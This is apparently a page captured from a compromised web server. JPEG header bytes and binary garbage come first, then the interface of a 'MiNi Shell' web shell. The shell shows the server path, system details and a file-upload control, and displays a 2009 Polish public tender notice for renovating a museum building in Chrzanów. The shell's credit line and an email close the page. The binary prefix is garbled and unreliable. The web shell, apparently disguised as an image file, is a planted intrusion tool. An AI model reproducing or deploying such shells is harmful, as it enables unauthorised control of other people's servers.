JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090407/94232-N-2009.html

<p class="kh_header"><b>Chrzanów: Renowacja saloniku biedermeierowskiego, wymiana rynien oraz renowacja gzymsów i stolarki okiennej w zabytkowym budynku lamusa dworskiego z XVI w.</b><br>
<b>Numer ogłoszenia: 94232 - 2009; data zamieszczenia: 07.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum w Chrzanowie im. Ireny i Mieczysława Mazarakich , ul. Mickiewicza 13, 32-500 Chrzanów, woj. małopolskie, tel. 032 6235173, faks 032 6235173.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.chrzanow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Renowacja saloniku biedermeierowskiego, wymiana rynien oraz renowacja gzymsów i stolarki okiennej w zabytkowym budynku lamusa dworskiego z XVI w..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie pierwszego etapu zadania pn. Renowacja saloniku biedermeierowskiego, wymiana rynien oraz renowacja gzymsów i stolarki okiennej w zabytkowym budynku lamusa dworskiego z XVI w.  Remont dotyczy siedziby Muzeum w Chrzanowie przy ul. Mickiewicza 13, wpisanego do rejestru zabytków pod numerem A - 151 decyzją z dnia 04.09.1969r. 
 
Zamawiający dopuszcza składanie ofert częściowych: 
  
Zakres robót dla części nr 1 obejmuje: wymianę blaszanych rynien na nowe miedziane i starych rur spustowych na miedziane, a w dolnych partiach do wysokości 2,5 m na tytanowo-cynkowe oraz konserwację drewnianego gzymsu wieńczącego przy rynnach;
Zakres robót dla części nr 2 obejmuje: konserwację 5 sztuk okien na parterze i 5 sztuk na poddaszu oraz wymianę w nich wszystkich zniszczonych, nieoryginalnych elementów i skrzydeł zewnętrznych z zainstalowaniem szyb UV, jak również konserwację drewnianych detali architektonicznych lukarn dachowych z rekonstrukcją brakujących elementów;
Zakres robót dla części nr 3 obejmuje: renowację saloniku biedermeierowskiego w zakresie sufitu i wszystkich ścian do wysokości lamperii (88 cm nad poziomem podłogi) z wyłączeniem drzwi i gablot ekspozycyjnych. 
 
Szczegółowy opis przedmiotu zamówienia odpowiednio dla każdej części, zawiera dokumentacja projektowa dołączona do SIWZ.

Warunki realizacji zamówienia zawarte zostały również we wzorach umów, które stanowią integralną część SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.44.00.00-3, 45.26.12.10-9, 45.26.13.00-7, 45.44.21.00-8, 45.41.00.00-4, 45.42.11.00-5, 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Wykonawca najpóźniej w dniu składania ofert, przed upływem terminu składania ofert, winien wnieść wadium, w wysokości:
a)900,00 zł (słownie: dziewięćset złotych 00/100) dla części nr 1
b)1.500,00 zł (słownie: jeden tysiąc pięćset złotych 00/100) dla części nr 2
c)2.000,00 zł (słownie: dwa tysiące zero złotych 00/100) dla części nr 3<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 
1.Posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają  obowiązek posiadania takich uprawnień; 
2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. To jest:
a)wykażą odpowiednio dla:
części nr 1 - iż wykonali z należytą starannością co najmniej jedno zamówienie w zakresie wymiany rynien i obróbek blacharskich wraz z robotami tynkarskimi i malarskimi w obiekcie zabytkowym; 
części nr 2 - iż wykonali z należytą starannością co najmniej jedno zamówienie w zakresie robót renowacyjnych stolarki okiennej w obiekcie zabytkowym; 
części nr 3 - iż wykonali z należytą starannością co najmniej jedno zamówienie w zakresie konserwacji boazerii drewnianej w  obiekcie zabytkowym; 
b)dysponują osobą przewidzianą do pełnienia funkcji kierownika budowy, posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, wraz z ważnym zaświadczeniem o przynależności do właściwej izby samorządu zawodowego oraz uprawnienia konserwatorskie do prac w obiektach zabytkowych lub udokumentowane doświadczenie w pracach konserwatorskich przy zabytkach nieruchomych;
c)dysponują co najmniej 2 osobami posiadającymi doświadczenie w wykonywaniu prac remontowych. Zamawiający uzna warunek za spełniony, jeżeli wskazane osoby, uczestniczyły w pracach remontowych, konserwatorskich lub restauratorskich, przy co najmniej jednym zamówieniu.  Wykonawcy składający ofertę na obie części przedmiotu zamówienia zobowiązani są do wskazania 4 osób spełniających wyżej opisany warunek, z kolei składający ofertę na trzy części przedmiotu zamówienia do wskazania 6 osób spełniających ww. warunek.  
Warunki przedstawione w pkt 2 wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą spełnić łącznie. 
3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.: są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę ubezpieczenia nie mniejszą niż 15.000,00 zł - dla części nr 1, 35.000,00 zł - dla części nr 2, 45.000,00 zł - dla części nr 3, w dniu otwarcia ofert.
W przypadku gdy ofertę składa kilka podmiotów działających wspólnie wystarczy złożenie tego (tych) dokumentów przez jednego z nich, odpowiednio dla każdej części przedmiotu zamówienia. 
4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust.1 pkt 1-10 i 2 pkt 1-4 ustawy PZP. 

A. Ocena spełnienia w/w warunków dokonana zostanie zgodnie z metodą 0 - 1, tj. nie spełnia lub spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt. 5  SIWZ  i dołączonych do oferty. 
B. Wykonawcy niespełniający powyższych warunków zostaną przez Zamawiającego wykluczeni  z niniejszego postępowania lub ich oferty zostaną odrzucone..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wypełniony i podpisany przez osoby uprawnione lub upoważnione przez Wykonawcę Formularz ofertowy, sporządzony według załącznika nr 1 do specyfikacji;
2.Pełnomocnictwo dołączone w formie oryginału lub notarialnie poświadczonej kopii, albo kopii poświadczonej za zgodność z oryginałem przez osoby udzielające pełnomocnictwa, jeśli oferta będzie podpisana przez pełnomocnika, przy czym dotyczy to również przypadków składania ofert przez podmioty występujące wspólnie, np. uczestników konsorcjum;
3.Oświadczenie Wykonawcy o spełnianiu warunków udziału w niniejszym postępowaniu określonych w SIWZ oraz w art. 22 ustawy PZP, jak również nie podleganiu wykluczeniu na podstawie  art. 24 ustawy PZP - załącznik nr 1 do formularza ofertowego
W przypadku, gdy ofertę składa kilka podmiotów działających wspólnie, dotyczy to każdego z nich.
4.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej  - wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
W przypadku, gdy ofertę składa kilka podmiotów działających wspólnie, dotyczy to każdego z nich.
5.W celu potwierdzenia spełniania warunku zawartego w pkt V p. pkt 2 lit a) specyfikacji Wykonawca przedłoży odpowiednio dla każdej części przedmiotu zamówienia na którą składa ofertę: wypełniony i podpisany wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, daty i miejsca wykonania oraz odbiorców, jak również załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - załącznik nr 2a do formularza ofertowego - dla części 1;  załącznik nr 2b do formularza ofertowego - dla części 2;  załącznik nr 2c do formularza ofertowego - dla części 3;  
6.W celu potwierdzenia spełniania warunku zawartego w pkt V p. pkt 2 lit b) oraz c) specyfikacji Wykonawca przedłoży wykaz osób, którymi dysponuje lub będzie dysponował i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności według załącznik nr 3 do formularza ofertowego wraz z dokumentami stwierdzającymi, że kierownik budowy posiada uprawnienia wymagana przepisami Prawa budowlanego, jest członkiem właściwej izby samorządu zawodowego oraz spełnia wymagania określone w Rozporządzeniu Ministra Kultury z dn. 9 czerwca 2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych   i poszukiwań ukrytych lub porzuconych zabytków ruchomych. 
7.Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 6, wykonawca wskazał osoby, którymi będzie dysponował, według załącznika nr 4 do formularza ofertowego. Dokument nie wymagany w sytuacji zaznaczenia przez wykonawcę w zał. nr 3, iż dysponuje wskazanymi osobami.
8.W celu potwierdzenia spełniania warunku zawartego w pkt V p. pkt 3 SIWZ Wykonawca przedłoży polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
9.Informacja o zakresie robót, których wykonanie wykonawca powierzy podwykonawcom, sporządzona według załącznika nr 5 do formularza ofertowego. Dokument niewymagany w przypadku gdy wykonawca nie przewiduje powierzenia części zamówienia podwykonawcom.
10.Kosztorys ofertowy, sporządzony zgodnie z zasadami kosztorysowania robót na podstawie dołączonych do specyfikacji materiałów, odpowiednio dla każdej części przedmiotu zamówienia.
11.Podpisany przez osoby uprawnione projekt umowy - załącznik nr  2a, 2b, 2c do specyfikacji, fakultatywnie.
12.Dowód wniesienia wadium. W przypadku składania ofert na więcej niż jedną część zamówienia wadium należy wnieść w sposób wyodrębniony, z wyraźnym wskazanie kwoty wadium i części, której ona dotyczy.
13.W przypadku gdy wykonawca ma siedzibę lub miejsce zamieszkania za granicą, w miejsce dokumentu, o których mowa w pozycji 4 wykazu, zobowiązany jest przedłożyć dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, zgodnie z § 2 Rozporządzenia PRM z dn. 19.05.06r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od wykonawców oraz form w jakich te dokumenty mogą być składane..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.muzeum.chrzanow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia dostępna jest na stronie www.muzeum.chrzanow.pl lub można odebrać osobiście w siedzibie Zamawiającego, przy ul. Mickiewicza 13, sekretariat, II p. za opłatą.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2009 godzina 14:00, miejsce: Oferty należy składać w siedzibie Zamawiającego przy ul. Mickiewicza 13, 32-500 Chrzanów, sekretariat, II p..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający przewiduje wniesienie zabezpieczenia należytego wykonania umowy. 
Zamawiający przewiduje możliwość dokonywania zmian w treści umowy w stosunku do treści oferty..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Renowacja saloniku biedermeierowskiego, wymiana rynien oraz renowacja gzymsów i stolarki okiennej w zabytkowym budynku lamusa dworskiego z XVI w..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót dla części nr 1 obejmuje: wymianę blaszanych rynien na nowe miedziane i starych rur spustowych na miedziane, a w dolnych partiach do wysokości 2,5 m na tytanowo-cynkowe oraz konserwację drewnianego gzymsu wieńczącego przy rynnach;
Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa dołączona do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.13.00-7, 45.26.12.10-9, 45.44.21.00-8, 45.42.11.00-5, 45.41.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Renowacja saloniku biedermeierowskiego, wymiana rynien oraz renowacja gzymsów i stolarki okiennej w zabytkowym budynku lamusa dworskiego z XVI w..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót dla części nr 2 obejmuje: konserwację 5 sztuk okien na parterze i 5 sztuk na poddaszu oraz wymianę w nich wszystkich zniszczonych, nieoryginalnych elementów i skrzydeł zewnętrznych z zainstalowaniem szyb UV, jak również konserwację drewnianych detali architektonicznych lukarn dachowych z rekonstrukcją brakujących elementów;
Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa dołączona do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.44.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Renowacja saloniku biedermeierowskiego, wymiana rynien oraz renowacja gzymsów i stolarki okiennej w zabytkowym budynku lamusa dworskiego z XVI w..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót dla części nr 3 obejmuje: renowację saloniku biedermeierowskiego w zakresie sufitu i wszystkich ścian do wysokości lamperii (88 cm nad poziomem podłogi) z wyłączeniem drzwi i gablot ekspozycyjnych. 
Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa dołączona do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com